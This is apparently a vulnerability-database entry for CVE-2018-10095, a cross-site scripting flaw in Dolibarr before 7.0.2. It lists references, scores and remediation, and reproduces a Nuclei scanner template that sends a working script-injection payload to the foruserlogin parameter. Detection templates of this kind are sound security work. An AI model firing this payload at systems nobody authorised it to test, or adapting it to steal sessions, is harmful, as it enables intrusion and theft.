Dolibarr <7.0.2 - Cross-Site Scripting

🗓️ 25 Jun 2026 01:31:50Reported by ProjectDiscoveryType

Dolibarr 7.0.2 Cross-Site Scripting vulnerabilit

Reporter	Title	Published	Views	Family All 15
Circl	CVE-2018-10095	25 Apr 202419:49	–	circl
CNVD	Dolibarr cross-site scripting vulnerability (CNVD-2018-15285)	23 May 201800:00	–	cnvd
CVE	CVE-2018-10095	22 May 201820:00	–	cve
Cvelist	CVE-2018-10095	22 May 201820:00	–	cvelist
Github Security Blog	Dolibarr Cross-site scripting (XSS) vulnerability	14 May 202203:20	–	github
NVD	CVE-2018-10095	22 May 201820:29	–	nvd
OpenVAS	Dolibarr < 7.0.2 Multiple Vulnerabilities	24 May 201800:00	–	openvas
OSV	CVE-2018-10095	22 May 201820:29	–	osv
OSV	GHSA-P2FM-8RHJ-58FR Dolibarr Cross-site scripting (XSS) vulnerability	14 May 202203:20	–	osv
OSV	UBUNTU-CVE-2018-10095	22 May 201820:29	–	osv

Source	Link
sysdream	www.sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability/
github	www.github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56
github	www.github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog
nvd	www.nvd.nist.gov/vuln/detail/CVE-2018-10095
openwall	www.openwall.com/lists/oss-security/2018/05/21/3

id: CVE-2018-10095

info:
  name: Dolibarr <7.0.2 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    Dolibarr before 7.0.2  is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to Dolibarr version 7.0.2 or later to mitigate this vulnerability.
  reference:
    - https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability/
    - https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56
    - https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10095
    - http://www.openwall.com/lists/oss-security/2018/05/21/3
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-10095
    cwe-id: CWE-79
    epss-score: 0.86988
    epss-percentile: 0.99721
    cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dolibarr
    product: dolibarr
  tags: cve2018,cve,xss,dolibarr,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e8a6cf642d79ff3bf66f297d89f63f1484dd181716ed2919eb4b7655a50e56f70220089877eae6829d7f30ffd22436c344e7e67821882495d6f389397ce846dff174:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6.8Medium risk

Vulners AI Score6.8

CVSS 24.3

CVSS 36.1

EPSS0.86988